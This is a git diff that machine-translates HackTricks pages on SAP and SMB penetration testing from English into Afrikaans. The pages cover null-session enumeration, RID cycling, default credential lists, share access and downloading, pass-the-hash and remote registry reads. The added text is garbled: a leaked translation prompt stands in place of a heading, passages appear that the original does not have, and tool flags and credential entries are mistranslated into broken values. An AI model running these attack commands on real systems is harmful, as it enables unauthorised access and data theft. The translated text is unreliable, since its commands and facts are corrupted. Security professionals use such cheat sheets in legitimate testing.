-* [SAP Penetration Testing Using Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
-* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - a script to semi-automate Bizploit
-* [SAP NetWeaver ABAP security configuration part 3: Default passwords for access to the application](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/)
-* [List of ABAP-transaction codes related to SAP security](https://wiki.scn.sap.com/wiki/display/Security/List+of+ABAP-transaction+codes+related+to+SAP+security)
+* [SAP-penetreringstoetsing met behulp van Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
+* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - 'n skrip om Bizploit semi-outomaties te maak
+* [SAP NetWeaver ABAP-sekuriteitskonfigurasie deel 3: Standaard wagwoorde vir toegang tot die toepassing](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/)
+* [Lys van ABAP-transaksiekodes wat verband hou met SAP-sekuriteit](https://wiki.scn.sap.com/wiki/display/Security/List+of+ABAP-transaction+codes+related+to+SAP+security)
 * [Breaking SAP Portal](https://erpscan.com/wp-content/uploads/presentations/2012-HackerHalted-Breaking-SAP-Portal.pdf)
-* [Top 10 most interesting SAP vulnerabilities and attacks](https://erpscan.com/wp-content/uploads/presentations/2012-Kuwait-InfoSecurity-Top-10-most-interesting-vulnerabilities-and-attacks-in-SAP.pdf)
+* [Top 10 mees interessante SAP-kwesbaarhede en aanvalle](https://erpscan.com/wp-content/uploads/presentations/2012-Kuwait-InfoSecurity-Top-10-most-interesting-vulnerabilities-and-attacks-in-SAP.pdf)
 * [Assessing the security of SAP ecosystems with bizploit: Discovery](https://www.onapsis.com/blog/assessing-security-sap-ecosystems-bizploit-discovery)
 * [https://www.exploit-db.com/docs/43859](https://www.exploit-db.com/docs/43859)
 * [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/)
@@ -322,16 +306,14 @@ bizploit> start
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-smb.md b/network-services-pentesting/pentesting-smb.md
index 9166708a0..255018096 100644
--- a/network-services-pentesting/pentesting-smb.md
+++ b/network-services-pentesting/pentesting-smb.md
@@ -2,84 +2,75 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## **Port 139**
-
-The **_Network Basic Input Output System_ (NetBIOS)** is a software protocol designed to enable applications, PCs, and Desktops within a local area network (LAN) to interact with network hardware and **facilitate the transmission of data across the network**. The identification and location of software applications operating on a NetBIOS network are achieved through their NetBIOS names, which can be up to 16 characters in length and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a command to "call" another application (acting as the server) utilizing **TCP Port 139**.
+## **Poort 139**
 
+Die **_Network Basic Input Output System_ (NetBIOS)** is 'n sagtewareprotokol wat ontwerp is om toepassings, rekenaars en lessenaars binne 'n plaaslike area-netwerk (LAN) in staat te stel om met netwerkhardeware te interaksieer en **die oordrag van data oor die netwerk te fasiliteer**. Die identifikasie en ligging van sagtewaretoepassings wat op 'n NetBIOS-netwerk werk, word bereik deur middel van hul NetBIOS-name, wat tot 16 karakters lank kan wees en dikwels verskil van die rekenaarnaam. 'n NetBIOS-sessie tussen twee toepassings word geïnisieer wanneer een toepassing (as die kliënt) 'n bevel uitreik om 'n ander toepassing (as die bediener) te "roep" deur gebruik te maak van **TCP-poort 139**.
 ```
 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
 ```
+## Poort 445
 
-## Port 445
-
-Technically, Port 139 is referred to as ‘NBT over IP’, whereas Port 445 is identified as ‘SMB over IP’. The acronym **SMB** stands for ‘**Server Message Blocks**’, which is also modernly known as the **Common Internet File System (CIFS)**. As an application-layer network protocol, SMB/CIFS is primarily utilized to enable shared access to files, printers, serial ports, and facilitate various forms of communication between nodes on a network.
-
-For example, in the context of Windows, it is highlighted that SMB can operate directly over TCP/IP, eliminating the necessity for NetBIOS over TCP/IP, through the utilization of port 445. Conversely, on different systems, the employment of port 139 is observed, indicating that SMB is being executed in conjunction with NetBIOS over TCP/IP.
+Tegnies gesproke word Poort 139 as 'NBT oor IP' verwys, terwyl Poort 445 geïdentifiseer word as 'SMB oor IP'. Die akroniem **SMB** staan vir 'Server Message Blocks', wat ook bekend is as die **Common Internet File System (CIFS)**. As 'n toepassingslaag-netwerkprotokol word SMB/CIFS hoofsaaklik gebruik om gedeelde toegang tot lêers, drukkers, seriële poorte moontlik te maak en verskillende vorms van kommunikasie tussen knooppunte op 'n netwerk te fasiliteer.
 
+Byvoorbeeld, in die konteks van Windows, word daar beklemtoon dat SMB direk oor TCP/IP kan werk, sonder die noodsaaklikheid van NetBIOS oor TCP/IP, deur die gebruik van poort 445. Daarenteen, op verskillende stelsels, word die gebruik van poort 139 waargeneem, wat aandui dat SMB saam met NetBIOS oor TCP/IP uitgevoer word.
 ```
 445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
 ```
-
 ### SMB
 
-The **Server Message Block (SMB)** protocol, operating in a **client-server** model, is designed for regulating **access to files**, directories, and other network resources like printers and routers. Primarily utilized within the **Windows** operating system series, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to seamlessly interact with those running older versions. Additionally, the **Samba** project offers a free software solution, enabling SMB's implementation on **Linux** and Unix systems, thereby facilitating cross-platform communication through SMB.
+Die **Server Message Block (SMB)**-protokol, wat in 'n **kliënt-bediener**-model werk, is ontwerp om **toegang tot lêers**, gidslys en ander netwerkbronne soos drukkers en roeteryers te reguleer. Dit word hoofsaaklik binne die **Windows**-bedryfstelselreeks gebruik en SMB verseker agterwaartse verenigbaarheid, wat toestelle met nuwer weergawes van Microsoft se bedryfstelsel in staat stel om naadloos te kommunikeer met dié wat ouer weergawes gebruik. Daarbenewens bied die **Samba**-projek 'n gratis sagteware-oplossing wat die implementering van SMB op **Linux**- en Unix-stelsels moontlik maak, wat kruisplatform kommunikasie deur middel van SMB fasiliteer.
 
-Shares, representing **arbitrary parts of the local file system**, can be provided by an SMB server, making the hierarchy visible to a client partly **independent** from the server's actual structure. The **Access Control Lists (ACLs)**, which define **access rights**, allow for **fine-grained control** over user permissions, including attributes like **`execute`**, **`read`**, and **`full access`**. These permissions can be assigned to individual users or groups, based on the shares, and are distinct from the local permissions set on the server.
+Shares, wat **willekeurige dele van die plaaslike lêersisteem** verteenwoordig, kan deur 'n SMB-bediener voorsien word, wat die hiërargie sienbaar maak vir 'n kliënt wat gedeeltelik **onafhanklik** is van die werklike struktuur van die bediener. Die **Access Control Lists (ACLs)**, wat **toegangsregte** definieer, maak fynkontrole oor gebruikersregte moontlik, insluitend eienskappe soos **`uitvoer`**, **`lees`** en **`volle toegang`**. Hierdie regte kan aan individuele gebruikers of groepe toegewys word, gebaseer op die shares, en is afsonderlik van die plaaslike regte wat op die bediener ingestel is.
 
 ### IPC$ Share
 
-Access to the IPC$ share can be obtained through an anonymous null session, allowing for interaction with services exposed via named pipes. The utility `enum4linux` is useful for this purpose. Utilized properly, it enables the acquisition of:
+Toegang tot die IPC$-share kan verkry word deur 'n anonieme nul-sessie, wat interaksie met dienste wat blootgestel word deur benoemde pype moontlik maak. Die nut `enum4linux` is nuttig vir hierdie doel. As dit korrek gebruik word, maak dit die verkryging van die volgende moontlik:
 
-- Information on the operating system
-- Details on the parent domain
-- A compilation of local users and groups
-- Information on available SMB shares
-- The effective system security policy
-
-This functionality is critical for network administrators and security professionals to assess the security posture of SMB (Server Message Block) services on a network. `enum4linux` provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential vulnerabilities and ensuring that the SMB services are properly secured.
+- Inligting oor die bedryfstelsel
+- Besonderhede oor die ouer domein
+- 'n Samestelling van plaaslike gebruikers en groepe
+- Inligting oor beskikbare SMB-shares
+- Die effektiewe stelselsekuriteitsbeleid
 
+Hierdie funksionaliteit is krities vir netwerkadministrateurs en sekuriteitsprofessionele om die sekuriteitspostuur van SMB (Server Message Block)-dienste op 'n netwerk te assesseer. `enum4linux` bied 'n omvattende siening van die teikensisteem se SMB-omgewing, wat noodsaaklik is om potensiële kwesbaarhede te identifiseer en te verseker dat die SMB-dienste behoorlik beveilig is.
 ```bash
 enum4linux -a target_ip
 ```
-
-The above command is an example of how `enum4linux` might be used to perform a full enumeration against a target specified by `target_ip`.
+Die bogenoemde bevel is 'n voorbeeld van hoe `enum4linux` gebruik kan word om 'n volledige opname teen 'n teiken wat deur `target_ip` gespesifiseer word, uit te voer.
 
 
-## What is NTLM
+## Wat is NTLM
 
-If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about **NTLM** where is explained **how this protocol works and how you can take advantage of it:**
+As jy nie weet wat NTLM is nie of as jy wil weet hoe dit werk en hoe om dit te misbruik, sal jy hierdie bladsy oor **NTLM** baie interessant vind waar dit verduidelik word **hoe hierdie protokol werk en hoe jy daarvan kan profiteer:**
 
 {% content-ref url="../windows-hardening/ntlm/" %}
 [ntlm](../windows-hardening/ntlm/)
 {% endcontent-ref %}
 
-## **Server Enumeration**
-
-### **Scan** a network searching for hosts:
+## **Bedieneropname**
 
+### **Skandeer** 'n netwerk om na gasheer te soek:
 ```bash
 nbtscan -r 192.168.0.1/24
 ```
+### SMB-bedienerweergawe
 
-### SMB server version
-
-To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
-
-* Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version**
-* Or this script:
+Om moontlike uitbuitings vir die SMB-weergawe te soek, is dit belangrik om te weet watter weergawe gebruik word. As hierdie inligting nie in ander gebruikte gereedskap verskyn nie, kan jy:
 
+* Die **MSF** hulpmodule \_**auxiliary/scanner/smb/smb\_version** gebruik
+* Of hierdie skrip:
 ```bash
 #!/bin/sh
 #Author: rewardone
@@ -96,34 +87,30 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
 echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
 echo "" && sleep .1
 ```
-
-### **Search exploit**
-
+### **Soek na uitbuiting**
 ```bash
 msf> search type:exploit platform:windows target:2008 smb
 searchsploit microsoft smb
 ```
+### **Moontlike** Gelde
 
-### **Possible** Credentials
-
-| **Username(s)**      | **Common passwords**                      |
+| **Gebruikersnaam(s)** | **Gewone wagwoorde**                      |
 | -------------------- | ----------------------------------------- |
-| _(blank)_            | _(blank)_                                 |
-| guest                | _(blank)_                                 |
-| Administrator, admin | _(blank)_, password, administrator, admin |
-| arcserve             | arcserve, backup                          |
-| tivoli, tmersrvd     | tivoli, tmersrvd, admin                   |
-| backupexec, backup   | backupexec, backup, arcada                |
-| test, lab, demo      | password, test, lab, demo                 |
+| _(leeg)_             | _(leeg)_                                  |
+| gas                  | _(leeg)_                                  |
+| Administrateur, admin| _(leeg)_, wagwoord, administrateur, admin |
+| arcserve             | arcserve, rugsteun                        |
+| tivoli, tmersrvd     | tivoli, tmersrvd, admin                    |
+| backupexec, rugsteun | backupexec, rugsteun, arcada               |
+| toets, laboratorium, demonstrasie | wagwoord, toets, laboratorium, demonstrasie |
 
 ### Brute Force
 
 * [**SMB Brute Force**](../generic-methodologies-and-resources/brute-force.md#smb)
 
-### SMB Environment Information
-
-### Obtain Information
+### SMB Omgewingsinligting
 
+### Verkry Inligting
 ```bash
 #Dump interesting information
 enum4linux -a [-u "" -p ""] 
@@ -145,11 +132,9 @@ rpcclient -U "username%passwd"  #With creds
 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]
 /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]
 ```
+### Enumereer Gebruikers, Groepe & Aangemelde Gebruikers
 
-### Enumerate Users, Groups & Logged On Users
-
-This info should already being gathered from enum4linux and enum4linux-ng
-
+Hierdie inligting moet reeds ingesamel word deur enum4linux en enum4linux-ng.
 ```bash
 crackmapexec smb 10.10.10.10 --users [-u  -p ]
 crackmapexec smb 10.10.10.10 --groups [-u  -p ]
@@ -161,51 +146,69 @@ rpcclient -U "" -N 10.10.10.10
 enumdomusers
 enumdomgroups
 ```
-
-### Enumerate local users
+### Enumereer plaaslike gebruikers
 
 [Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
-
 ```bash
 lookupsid.py -no-pass hostname.local
 ```
-
-Oneliner
-
+Die volgende is inhoud uit 'n hakboek oor hakmetodes. Die volgende inhoud is uit die lêer /hive/hacktricks/network-services-pentesting/pentesting-smb.md. Vertaal die relevante Engelse teks na Afrikaans en gee die vertaling terug met presies dieselfde markdown- en html-sintaksis. Moenie dinge soos kode, hakmetode name, hakwoorde, wolk/SaaS-platformname (soos Workspace, aws, gcp...), die woord 'leak', pentesting, en markdown-etikette vertaal nie. Voeg ook geen ekstra goed by behalwe die vertaling en markdown-sintaksis nie.
 ```bash
 for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
 ```
+### Metasploit - Enumereer plaaslike gebruikers
 
-### Metasploit - Enumerate local users
+Hierdie module in Metasploit word gebruik om plaaslike gebruikers op 'n teikensisteem te ondersoek. Dit kan nuttig wees vir die identifisering van potensiële aanvalsveilighede en die verkryging van toegang tot die sisteem. Die module maak gebruik van die SMB-protokol om die ondersoek uit te voer.
 
+#### Gebruik
+
+Om hierdie module te gebruik, voer die volgende opdrag in die Metasploit-konsole in:
+
+```
+use auxiliary/scanner/smb/smb_enumusers
+```
+
+Stel die vereiste parameters in, soos die IP-adres van die teikensisteem en die SMB-gebruikersnaam en -wagwoord. Gebruik die `set`-opdrag om die parameters in te stel.
+
+```
+set RHOSTS 
+set SMBUser 
+set SMBPass 
+```
+
+Voer die module uit deur die `run`-opdrag te gebruik:
+
+```
+run
+```
+
+Die module sal dan begin om die plaaslike gebruikers op die teikensisteem te ondersoek en die resultate sal in die Metasploit-konsole vertoon word.
 ```bash
 use auxiliary/scanner/smb/smb_lookupsid
 set rhosts hostname.local
 run
 ```
-
-### **Enumerating LSARPC and SAMR rpcclient**
+### **Enumerasie van LSARPC en SAMR rpcclient**
 
 {% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
 [rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
 {% endcontent-ref %}
 
-### GUI connection from linux
+### GUI-verbinding vanaf Linux
 
-#### In the terminal:
+#### In die terminaal:
 
 `xdg-open smb://cascade.htb/`
 
-#### In file browser window (nautilus, thunar, etc)
+#### In die lêerblaaier-venster (nautilus, thunar, ens.)
 
 `smb://friendzone.htb/general/`
 
-## Shared Folders Enumeration
+## Gedeelde vouers Enumerasie
 
-### List shared folders
-
-It is always recommended to look if you can access to anything, if you don't have credentials try using **null** **credentials/guest user**.
+### Lys gedeelde vouers
 
+Dit word altyd aanbeveel om te kyk of jy toegang het tot enige iets, as jy nie geloofsbriewe het nie, probeer **nul** **geloofsbriewe/gasgebruiker** gebruik.
 ```bash
 smbclient --no-pass -L // # Null user
 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@@ -219,9 +222,28 @@ crackmapexec smb  -u '' -p '' --shares #Null user
 crackmapexec smb  -u 'username' -p 'password' --shares #Guest user
 crackmapexec smb  -u 'username' -H '' --shares #Guest user
 ```
+### **Verbind/Lys 'n gedeelde vouer**
 
-### **Connect/List a shared folder**
+Om 'n gedeelde vouer aan te sluit of te lys, kan jy die volgende stappe volg:
 
+1. Gebruik die `smbclient`-hulpmiddel om 'n verbinding met die SMB-diens te maak. Voer die volgende opdrag in die opdragreël in:
+
+   ```bash
+   smbclient /// -U 
+   ```
+
+   Vervang `` met die IP-adres van die doelwit-stelsel en `` met die naam van die gedeelde vouer wat jy wil verbind of lys. Voeg ook die korrekte `` en wagwoord in vir die SMB-verifikasie.
+
+2. As die verbinding suksesvol is, sal jy 'n `smb: \>`-opdragreël sien. Jy kan die volgende opdragte gebruik om die gedeelde vouer te ondersoek:
+
+   - `ls`: Lys die inhoud van die huidige gedeelde vouer.
+   - `cd `: Verander na 'n spesifieke vouer binne die gedeelde vouer.
+   - `get `: Laai 'n spesifieke lêer van die gedeelde vouer af na jou plaaslike stelsel.
+   - `put `: Laai 'n spesifieke lêer van jou plaaslike stelsel na die gedeelde vouer.
+
+3. As jy klaar is met die ondersoek van die gedeelde vouer, kan jy die verbinding verbreek deur die `exit`-opdrag in te voer by die `smb: \>`-opdragreël.
+
+Dit is belangrik om te onthou dat jy die nodige toegangsregte moet hê om die gedeelde vouer te kan verbind of lys.
 ```bash
 #Connect using smbclient
 smbclient --no-pass ///
@@ -233,12 +255,11 @@ smbmap [-u "username" -p "password"] -R [Folder] -H  [-P ] # Recursive
 smbmap [-u "username" -p "password"] -r [Folder] -H  [-P ] # Non-Recursive list
 smbmap -u "username" -p ":" [-r/-R] [Folder] -H  [-P ] #Pass-the-Hash
 ```
+### **Handmatig ondersoek van Windows-aandele en koppel daaraan**
 
-### **Manually enumerate windows shares and connect to them**
+Dit is moontlik dat jy beperk is om enige aandele van die gasheer-rekenaar te vertoon en wanneer jy probeer om hulle op te lys, lyk dit asof daar geen aandele is om aan te koppel nie. Dit mag dus die moeite werd wees om 'n poging te waag om handmatig aan 'n aandeel te koppel. Om die aandele handmatig te ondersoek, wil jy dalk kyk vir reaksies soos NT\_STATUS\_ACCESS\_DENIED en NT\_STATUS\_BAD\_NETWORK\_NAME wanneer jy 'n geldige sessie gebruik (bv. 'n nul-sessie of geldige geloofsbriewe). Dit kan aandui of die aandeel bestaan en jy nie toegang daartoe het nie, of dat die aandeel glad nie bestaan nie.
 
-It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all.
-
-Common share names for windows targets are
+Gewone aandele name vir Windows teikens is
 
 * C$
 * D$
@@ -249,17 +270,14 @@ Common share names for windows targets are
 * SYSVOL
 * NETLOGON
 
-(Common share names from _**Network Security Assessment 3rd edition**_)
-
-You can try to connect to them by using the following command
+(Gewone aandele name van _**Network Security Assessment 3rd edition**_)
 
+Jy kan probeer om daaraan te koppel deur die volgende bevel te gebruik
 ```bash
 smbclient -U '%' -N \\\\\\ # null session to connect to a windows share
 smbclient -U '' \\\\\\ # authenticated session to connect to a windows share (you will be prompted for a password)
 ```
-
-or this script (using a null session)
-
+of hierdie skrip (deur 'n nul-sessie te gebruik)
 ```bash
 #/bin/bash
 
@@ -267,27 +285,23 @@ ip=''
 shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
 
 for share in ${shares[*]}; do
-    output=$(smbclient -U '%' -N \\\\$ip\\$share -c '') 
+output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
 
-    if [[ -z $output ]]; then 
-        echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
-    else
-        echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
-    fi
+if [[ -z $output ]]; then
+echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
+else
+echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
+fi
 done
 ```
-
-examples
-
+Voorbeelde
 ```bash
 smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
 smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
 ```
-
-### **Enumerate shares from Windows / without third-party tools**
+### **Enumerateer gedeeltes vanaf Windows / sonder hulpmiddels van derde partye**
 
 PowerShell
-
 ```powershell
 # Retrieves the SMB shares on the locale computer.
 Get-SmbShare
@@ -297,38 +311,41 @@ get-smbshare -CimSession ""
 # Retrieves the connections established from the local SMB client to the SMB servers.
 Get-SmbConnection
 ```
+CMD-konsole
 
-CMD console
+Die CMD-konsole is 'n opdraggewer-venster wat gebruik word om opdragte uit te voer en met die bedryfstelsel te kommunikeer. Dit is 'n kragtige hulpmiddel wat deur pentesters gebruik kan word om verskeie take uit te voer, soos netwerkondersoek, lêerbestuur, prosesbestuur en nog baie meer. Hier is 'n paar nuttige opdragte wat in die CMD-konsole gebruik kan word:
 
+- `ipconfig`: Gee inligting oor die netwerkverbindings op die stelsel.
+- `ping`: Stuur 'n ICMP-sonde na 'n spesifieke IP-adres om te kyk of dit bereikbaar is.
+- `nslookup`: Voer DNS-navrae uit om DNS-inligting oor 'n spesifieke domein te verkry.
+- `netstat`: Gee 'n lys aktiewe netwerkverbindings en poorte op die stelsel.
+- `tasklist`: Gee 'n lys aktiewe prosesse op die stelsel.
+- `net user`: Voer gebruikersbestuurstake uit, soos die lys van gebruikers op die stelsel en die verandering van gebruikerswagwoorde.
+
+Dit is net 'n paar voorbeelde van die opdragte wat in die CMD-konsole gebruik kan word. Deur hierdie opdragte te gebruik, kan pentesters die netwerk en stelsel ondersoek, kwesbaarhede identifiseer en toegang tot die stelsel verkry vir verdere pentesting-aktiwiteite.
 ```shell
 # List shares on the local computer
 net share
 # List shares on a remote computer (including hidden ones)
 net view \\ /all
 ```
-
-MMC Snap-in (graphical)
-
+MMC Snap-in (grafies)
 ```shell
 # Shared Folders: Shared Folders > Shares
 fsmgmt.msc
 # Computer Management: Computer Management > System Tools > Shared Folders > Shares
 compmgmt.msc
 ```
+explorer.exe (grafies), tik `\\\` in om die beskikbare nie-versteekte gedeeltes te sien.
 
-explorer.exe (graphical), enter `\\\` to see the available non-hidden shares.
-
-### Mount a shared folder
-
+### Monteer 'n gedeelde vouer
 ```bash
 mount -t cifs //x.x.x.x/share /mnt/share
 mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
 ```
+### **Laai lêers af**
 
-### **Download files**
-
-Read previous sections to learn how to connect with credentials/Pass-the-Hash.
-
+Lees vorige afdelings om te leer hoe om te verbind met geloofsbriewe/Pass-the-Hash.
 ```bash
 #Search a file and download
 sudo smbmap -R Folder -H  -A  -q # Search the file in recursive mode and download it inside /usr/share/smbmap
@@ -343,83 +360,73 @@ smbclient ///
 > mget *
 #Download everything to current directory
 ```
+Opdragte:
 
-Commands:
+* masker: spesifiseer die masker wat gebruik word om die lêers binne die gids te filtreer (bv. "" vir alle lêers)
+* rekursie: skakel rekursie aan (verstek: af)
+* vra: skakel vrae vir lêernaam af (verstek: aan)
+* mget: kopieer alle lêers wat ooreenstem met die masker vanaf die bediener na die klientrekenaar
 
-* mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
-* recurse: toggles recursion on (default: off)
-* prompt: toggles prompting for filenames off (default: on)
-* mget: copies all files matching the mask from host to client machine
+(_Inligting van die manblad van smbclient_)
 
-(_Information from the manpage of smbclient_)
-
-### Domain Shared Folders Search
+### Soek na Gedeelde Gids van die Domein
 
 * [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
-
 ```bash
 Snaffler.exe -s -d domain.local -o snaffler.log -v data
 ```
-
-* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
-  * `-M spider_plus [--share ]`
-  * `--pattern txt`
-
+* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spinnekop.
+* `-M spinnekop_plus [--share ]`
+* `--patroon txt`
 ```bash
 sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
 ```
-
-Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
+Spesiaal interessant vanaf shares is die lêers genaamd **`Registry.xml`** aangesien hulle **moontlik wagwoorde** kan bevat vir gebruikers wat gekonfigureer is met **autologon** via Groepbeleid. Of **`web.config`** lêers aangesien hulle geloofsbriewe bevat.
 
 {% hint style="info" %}
-The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
-You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
+Die **SYSVOL share** is **leesbaar** deur alle geautehtiseerde gebruikers in die domein. Daar kan jy **baie verskillende batch, VBScript, en PowerShell skripte** vind.\
+Jy moet die **skripte** binne-in dit ondersoek aangesien jy moontlik sensitiewe inligting soos **wagwoorde** kan vind.
 {% endhint %}
 
-## Read Registry
-
-You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:
+## Lees Register
 
+Jy kan dalk die register **lees** deur van die ontdekte geloofsbriewe gebruik te maak. Impacket **`reg.py`** stel jou in staat om dit te probeer:
 ```bash
 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
 ```
+## Post Exploitasie
 
-## Post Exploitation
+Die **standaard konfigurasie van** 'n **Samba**-bediener is gewoonlik geleë in `/etc/samba/smb.conf` en mag enkele **gevaarlike konfigurasies** hê:
 
-The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**:
-
-| **Setting**                 | **Description**                                                     |
